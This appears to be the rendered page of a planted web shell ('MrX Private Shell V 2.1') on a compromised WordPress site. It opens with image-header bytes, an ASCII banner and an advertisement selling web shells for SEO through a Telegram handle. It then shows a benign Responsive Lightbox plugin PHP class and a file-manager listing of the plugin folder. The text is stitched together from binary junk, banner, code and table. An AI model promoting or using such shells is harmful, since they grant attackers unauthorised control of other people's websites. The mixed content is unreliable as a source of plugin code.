����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
// exit if accessed directly
if ( ! defined( 'ABSPATH' ) )
exit;
class Responsive_Lightbox_Folders_Walker extends Walker {
var $tree_type = 'category';
var $db_fields = array(
'parent' => 'parent',
'id' => 'term_id'
);
/**
* Starts the list before the elements are added.
*
* @param string $output Passed by reference, used to append additional content
* @param int $depth Depth of the item
* @param array $args An array of additional arguments
*/
function start_lvl( &$output, $depth = 0, $args = array() ) {
$output .= str_repeat( "\t", $depth ) . "<ul class='children'>\n";
}
/**
* Ends the list of after the elements are added.
*
* @param string $output Passed by reference, used to append additional content
* @param int $depth Depth of the item
* @param array $args An array of additional arguments
*/
function end_lvl( &$output, $depth = 0, $args = array() ) {
$output .= str_repeat( "\t", $depth ) . "</ul>\n";
}
/**
* Start the element output.
*
* @param string $output Passed by reference, used to append additional content
* @param object $category The current term object
* @param int $depth Depth of the item
* @param array $args An array of additional arguments
* @param int $id ID of the current item
*/
function start_el( &$output, $category, $depth = 0, $args = array(), $id = 0 ) {
extract( $args );
if ( empty( $taxonomy ) )
$taxonomy = Visual_Folders()->options['general']['media_taxonomy'];
$class = in_array( $category->term_id, $popular_cats ) ? ' class="popular-category"' : '';
$output .= "\n<li id='{$taxonomy}-{$category->term_id}'$class>" . '<label class="selectit"><input value="' . $category->slug . '" type="checkbox" name="' . $taxonomy . '_terms[' . $category->slug . ']" id="in-' . $taxonomy . '-' . $category->term_id . '" ' . checked( in_array( $category->term_id, $selected_cats ), true, false ) . ' ' . disabled( empty( $args['disabled'] ), false, false ) . ' /> ' . esc_html( apply_filters( 'the_category', $category->name ) ) . '</label>';
}
/**
* Ends the element output, if needed.
*
* @param string $output Passed by reference, used to append additional content
* @param object $category The current term object
* @param int $depth Depth of the item
* @param array $args An array of additional arguments
*/
function end_el( &$output, $category, $depth = 0, $args = array() ) {
$output .= "</li>\n";
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| providers | Folder | 0755 |
|
|
| class-fast-image.php | File | 4.09 KB | 0644 |
|
| class-folders-walker.php | File | 2.4 KB | 0644 |
|
| class-folders.php | File | 41.62 KB | 0644 |
|
| class-frontend.php | File | 90.25 KB | 0644 |
|
| class-galleries.php | File | 175.14 KB | 0644 |
|
| class-multilang.php | File | 9.31 KB | 0644 |
|
| class-remote-library-api.php | File | 6.7 KB | 0644 |
|
| class-remote-library.php | File | 16.26 KB | 0644 |
|
| class-settings.php | File | 111.58 KB | 0644 |
|
| class-tour.php | File | 15.58 KB | 0644 |
|
| class-welcome.php | File | 6.08 KB | 0644 |
|
| class-widgets.php | File | 27.42 KB | 0644 |
|
| functions.php | File | 4.32 KB | 0644 |
|